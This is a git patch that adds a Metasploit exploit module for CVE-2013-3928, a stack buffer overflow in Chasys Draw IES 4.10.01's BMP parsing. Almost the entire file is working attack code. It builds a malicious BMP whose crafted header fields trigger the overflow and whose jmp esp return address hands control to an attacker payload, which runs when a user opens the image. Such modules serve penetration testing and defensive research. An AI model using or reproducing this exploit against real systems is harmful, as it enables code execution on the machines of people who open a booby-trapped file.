From b3f229ff59e468fa1d292b9fd913d6ce9ae118f3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 12 Aug 2013 17:18:30 -0500 Subject: [PATCH] Add module for CVE-2013-3928 --- .../fileformat/chasys_draw_ies_bmp_bof.rb | 99 +++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb new file mode 100644 index 0000000000..2e5d132e8b --- /dev/null +++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb @@ -0,0 +1,99 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info={}) + super(update_info(info, + 'Name' => "Chasys Draw IES Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found in Chasys Draw IES + (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while + parsing BMP files, where the ReadFile function is used to store user provided data + on the stack in a insecure way. It results in arbitrary code execution under the + context of the user viewing a specially crafted BMP file. This module has been + tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 + SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Christopher Gabriel', # Vulnerability Discovery + 'Longinos Recuero Bustos', # PoC + 'Javier \'soez\'', # PoC + 'juan vazquez' # Metasploit + ], + 'References' => + [ + [ 'CVE', '2013-3928' ], + [ 'BID', '61463' ], + [ 'URL', 'http://secunia.com/advisories/53773/' ], + [ 'URL', 'http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html' ] + ], + 'Payload' => + { + 'Space' => 21112, # Indeed there is more space available on the stack, just limited by the trigger + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1', + { + 'Offset' => 65536, + 'Ret' => 0x10005fd3 # jmp esp # from flt_BMP.dll v4.10.1.0 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => "Jul 26 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.bmp']), + ], self.class) + + end + + def exploit + + bof = rand_text(target['Offset']) + bof << [target.ret].pack("V") + bof << payload.encoded + + bitmap_header = "" + bitmap_header << [0x28].pack("V") # HeaderSize + bitmap_header << [0x4a3].pack("V") # Width # Used to trigger the overflow + bitmap_header << [0x1].pack("V") # Height + bitmap_header << [0x9].pack("v") # Planes # Used to trigger the overflow + bitmap_header << [0x41].pack("v") # BitCount # Used to trigger the overflow + bitmap_header << [0x0].pack("V") # Compression + bitmap_header << [bof.length].pack("V") # SizeImage + bitmap_header << [0x0].pack("V") # PelsPerMeterX + bitmap_header << [0x0].pack("V") # PelsPerMeterY + bitmap_header << [0x0].pack("V") # ClrUse + bitmap_header << [0x0].pack("V") # ClrImportant + + total_size = bof.length + bitmap_header.length + 14 # 14 => file header length + + file_header = "" + file_header << "BM" # Signature + file_header << [total_size].pack("V") # Size + file_header << [0].pack("V") # Reserved + file_header << [0x36].pack("V") # BitsOffsets + + bmp = file_header + bitmap_header + bof + file_create(bmp) + end +end +